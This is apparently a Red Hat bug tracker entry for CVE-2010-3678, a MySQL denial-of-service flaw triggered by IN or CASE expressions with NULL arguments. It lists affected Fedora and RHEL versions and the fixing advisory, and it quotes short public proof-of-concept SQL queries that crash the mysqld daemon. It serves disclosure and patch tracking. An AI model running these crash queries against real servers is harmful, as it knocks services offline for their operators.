A denial of service flaw was found in the way MySQL processed SQL
queries containing IN or CASE statements, when NULL argument was
provided as one of the arguments to the query. A remote MySQL user
could use this flaw to cause myqld daemon crash (dereference a NULL
Upstream bug report:
Public issue proof of concepts (from ):
drop table if exists `t1`;
create table `t1`(`a` int)engine=myisam;
insert into `t1` values (1);
/*crash1*/select (`a` in (`a`,`a`)) from `t1` group by `a` with rollup;
/*crash2*/select (case (`a`) when (`a`) then (`a`) end) as `a` from `t1` group by `a`
CREATE TABLE t1(a INT);
INSERT INTO t1 VALUES (1), (2);
SELECT 1 IN (NULL, a) FROM t1;
This issue did NOT affect the versions of the mysql package, as shipped
with Red Hat Enterprise Linux 3, 4, or 5.
This issue affects the versions of the mysql package, as shipped with
Fedora release of 12 and 13.
CVE Request: http://www.openwall.com/lists/oss-security/2010/08/30/8
Created mysql tracking bugs for this issue
Affects: fedora-all [bug 636780]
The CVE identifier of CVE-2010-3678 has been assigned to this issue.
Not vulnerable. This issue did not affect the versions of mysql as
shipped with Red Hat Enterprise Linux 3, 4, or 5.
This issue has been addressed in following products:
Red Hat Enterprise Linux 6
Via RHSA-2011:0164 https://rhn.redhat.com/errata/RHSA-2011-0164.html